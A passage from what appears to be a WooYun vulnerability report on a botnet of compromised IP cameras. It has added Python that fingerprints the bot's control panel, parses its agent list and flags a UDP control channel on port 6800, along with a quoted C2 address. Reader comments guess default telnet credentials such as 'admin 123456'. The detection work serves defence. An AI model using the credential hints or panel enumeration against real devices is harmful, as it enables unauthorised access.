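The banner and the GBK column headers above are enough to fingerprint this management end and to pull the agent inventory out of its listing page, whether it comes from a scanner sweep or from a seized server. The Python below is an added example and is not code from the report or from the bot: the Server header, the modInfo.txt attachment, the agent_info.txt link and the four GBK header strings are the ones in the string dump above, while the row layout (one <td> per column, in header order) and the sample response are constructed assumptions, because the %s that fills the table is not in the dump.

```python
import re

# Indicators lifted from the sample's string table (sysCmdServer.o / httpServer.c).
PANEL_SERVER_BANNER = b"Server: wuchen's Server <0.1>"
PANEL_MODINFO_ATTACHMENT = b"filename = modInfo.txt"
PANEL_AGENT_INFO_LINK = b'href="agent_info.txt"'

# The four <th> labels exactly as they sit in the binary: GBK bytes, which is
# why a plain dump renders them as \B4\FA\C0\ED... escapes.
GBK_COLUMN_HEADERS = [
    b"\xb4\xfa\xc0\xedIP",                # proxy IP
    b"\xb6\xcb\xbf\xda",                  # port
    b"\xc6\xf4\xb6\xaf\xca\xb1\xbc\xe4",  # start time
    b"\xce\xef\xc0\xed\xb5\xd8\xd6\xb7",  # physical address (the MAC the client collects)
]


def decode_gbk_labels(raw_labels):
    """Decode the raw GBK header bytes so an analyst can read them."""
    return [label.decode("gbk") for label in raw_labels]


def panel_indicators(raw_response):
    """Return the names of every panel marker found in one raw HTTP response."""
    head, _, body = raw_response.partition(b"\r\n\r\n")
    found = []
    if PANEL_SERVER_BANNER in head:
        found.append("server-banner")
    if PANEL_MODINFO_ATTACHMENT in head:
        found.append("modinfo-attachment")
    if all(h in body for h in GBK_COLUMN_HEADERS):
        found.append("agent-table-headers")
    if PANEL_AGENT_INFO_LINK in body:
        found.append("agent-info-link")
    return found


def is_panel_response(raw_response):
    """Two independent markers are required: a Server header alone is trivially spoofed."""
    return len(panel_indicators(raw_response)) >= 2


# Assumed row layout: one <td> per column, in header order. The real panel
# fills the table through a %s that is not in the dump.
AGENT_ROW_RE = re.compile(
    rb"<tr>\s*<td[^>]*>([^<]*)</td>\s*<td[^>]*>([^<]*)</td>"
    rb"\s*<td[^>]*>([^<]*)</td>\s*<td[^>]*>([^<]*)</td>\s*</tr>"
)


def parse_agent_table(raw_response):
    """Extract (proxy IP, port, start time, MAC) records from the listing page."""
    _, _, body = raw_response.partition(b"\r\n\r\n")
    agents = []
    for ip, port, started, mac in AGENT_ROW_RE.findall(body):
        agents.append({
            "proxy_ip": ip.decode("ascii").strip(),
            "port": int(port.decode("ascii")),
            "started": started.decode("gbk").strip(),
            "mac": mac.decode("ascii").strip().lower(),
        })
    return agents


# Constructed sample response (RFC 5737 documentation addresses, made-up MACs
# and timestamps); only the headers and labels come from the dump.
SAMPLE_PANEL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: wuchen's Server <0.1>\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<html><body><table width="800" border="4" align="center" id="table1"><tbody id="table2">'
    b'<tr><th align="lest">\xb4\xfa\xc0\xedIP</th><th align="right">\xb6\xcb\xbf\xda</th>'
    b'<th align="right">\xc6\xf4\xb6\xaf\xca\xb1\xbc\xe4</th>'
    b'<th align="right">\xce\xef\xc0\xed\xb5\xd8\xd6\xb7</th></tr>'
    b"<tr><td>192.0.2.10</td><td>6800</td><td>2014-12-01 10:00:00</td><td>00:11:22:33:44:55</td></tr>"
    b"<tr><td>198.51.100.7</td><td>1080</td><td>2014-12-03 08:15:42</td><td>AA:BB:CC:DD:EE:FF</td></tr>"
    b"</tbody></table>"
    b'<div style="position:fixed; bottom:10px; right:5px;">'
    b'<a href="agent_info.txt">\xb5\xe3\xbb\xf7\xcf\xc2\xd4\xd8</a></div></body></html>'
)

if __name__ == "__main__":
    print(decode_gbk_labels(GBK_COLUMN_HEADERS))
    print(panel_indicators(SAMPLE_PANEL_RESPONSE))
    for agent in parse_agent_table(SAMPLE_PANEL_RESPONSE):
        print(agent)
```

The listing page never carries the modInfo.txt attachment header, so the fingerprint leans on the Server banner plus the GBK headers or the agent_info.txt link; a banner-only hit is returned by panel_indicators for triage but is not counted as a panel on its own.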
###########################################################################
Is that it? No!!!!
netstat -an shows:
udp 0 0 192.168.10.200:6800 218.25.10.101:6800 ESTABLISHED
What is 218.25.10.101? A Baidu search shows it is indexed,
but it looks like it was compromised a long time ago.
And the tmp directory holds all kinds of oddball trojans.
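That netstat line is worth turning into a repeatable check: on Linux a UDP socket is shown as ESTABLISHED only after the program called connect() on it, so a connected UDP socket from a camera to a public address is a strong sign of a control channel. The Python below is an added example, not from the report: it parses netstat -an output in the Linux/BusyBox layout and flags connected UDP sockets to public peers, plus any peer on the port this sample used (6800; treating that port as an indicator for other infections is an assumption). The sample output is constructed, and only the 6800/udp line is the one quoted above.

```python
import ipaddress
import re

# Port seen in the report's netstat line. Assumption: other infections of this
# family reuse it; treat it as a family indicator, not a general rule.
KNOWN_C2_PORTS = frozenset({6800})

# One socket line as printed by Linux/BusyBox `netstat -an` (state is optional:
# UDP lines that were never connect()ed print none).
NETSTAT_LINE_RE = re.compile(
    r"^(tcp|udp)6?\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s*(\S*)$"
)


def parse_netstat(text):
    """Turn `netstat -an` output into socket records; header and other lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = NETSTAT_LINE_RE.match(line.strip())
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        sockets.append({
            "proto": proto,
            "laddr": laddr, "lport": None if lport == "*" else int(lport),
            "faddr": faddr, "fport": None if fport == "*" else int(fport),
            "state": state,
        })
    return sockets


def is_public_peer(addr):
    """True for a routable address: not private, not reserved, not 0.0.0.0 or '*'."""
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:  # "*" or anything else that is not an address
        return False


def find_c2_candidates(netstat_text, c2_ports=KNOWN_C2_PORTS):
    """Return [(socket, [reasons])] for sockets that look like a bot's control channel."""
    hits = []
    for s in parse_netstat(netstat_text):
        if not is_public_peer(s["faddr"]):
            continue
        reasons = []
        if s["proto"] == "udp" and s["state"] == "ESTABLISHED":
            reasons.append("connected UDP socket to a public peer (connect() was called on it)")
        if s["fport"] in c2_ports:
            reasons.append("peer port %d matches the sample's C2 port" % s["fport"])
        if reasons:
            hits.append((s, reasons))
    return hits


# Constructed sample: only the 6800/udp line is the one quoted in the report;
# the others are ordinary camera sockets added so the filter has noise to skip.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.10.200:23       192.168.10.5:50112      ESTABLISHED
tcp        0      0 192.168.10.200:80       192.168.10.5:50120      ESTABLISHED
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 192.168.10.200:6800     218.25.10.101:6800      ESTABLISHED
"""

if __name__ == "__main__":
    for sock, reasons in find_c2_candidates(SAMPLE_NETSTAT):
        print("%s %s:%s -> %s:%s" % (sock["proto"], sock["laddr"], sock["lport"],
                                     sock["faddr"], sock["fport"]))
        for reason in reasons:
            print("  -", reason)
```

Run it against `netstat -an` captured from the device over the same telnet session; because the filter keys on a connected UDP socket to a public peer rather than on the port alone, it still fires when the operator moves the C2 to another port.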

Fix recommendation:

Analyse the source code. Take down the botnet. Then wait for the "water-meter inspection" (the knock on the door from the authorities)...

Copyright notice: when reposting, please credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed at: 2014-12-17 16:32

Vendor reply:

CNVD confirms the situation described and has notified the software manufacturer through the handling channels it established previously.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-12-14 20:06 | sin ( Intern white hat | Rank:38 vulns:2 | Looking for the most elegant solution)

    Someone actually built it!!!! Back then I already thought there was real potential in this. Big bandwidth, more than you would expect. Using them as nodes, as leverage, that kind of thing.

  2. 2014-12-14 21:30 | 泳少 ( Regular white hat | Rank:231 vulns:79 | ★ Once you set out on the road to your dream, even on your knees you...)

    First case? @疯狗

  3. 2014-12-14 22:18 | Fire ant ( Intern white hat | Rank:73 vulns:26 | They're back................)

    Not going to say more........ UDP, here we go

  4. 2014-12-15 10:26 | cncert National Internet Emergency Center (WooYun vendor)

    mark

  5. 2014-12-15 11:10 | cncert National Internet Emergency Center (WooYun vendor)

    Hello: thank you for your support of CNVD. Please help CNVD by providing the IP addresses, models and passwords of the devices you found, and if possible a few device cases (at least 2), so that CNVD can verify and reproduce the issue; please send them as a document to vreport@cert.org.cn. Thank you!

  6. 2014-12-15 12:18 | Fire ant ( Intern white hat | Rank:73 vulns:26 | They're back................)

    I bet it's admin admin..........

  7. 2015-03-14 19:09 | 明月影 ( Passer-by | Rank:12 vulns:8 | Learning techniques, learning approaches.)

    An email address leaked, so maybe one could...

  8. 2015-04-02 22:25 | Fire ant ( Intern white hat | Rank:73 vulns:26 | They're back................)

    telnet~~admin 123456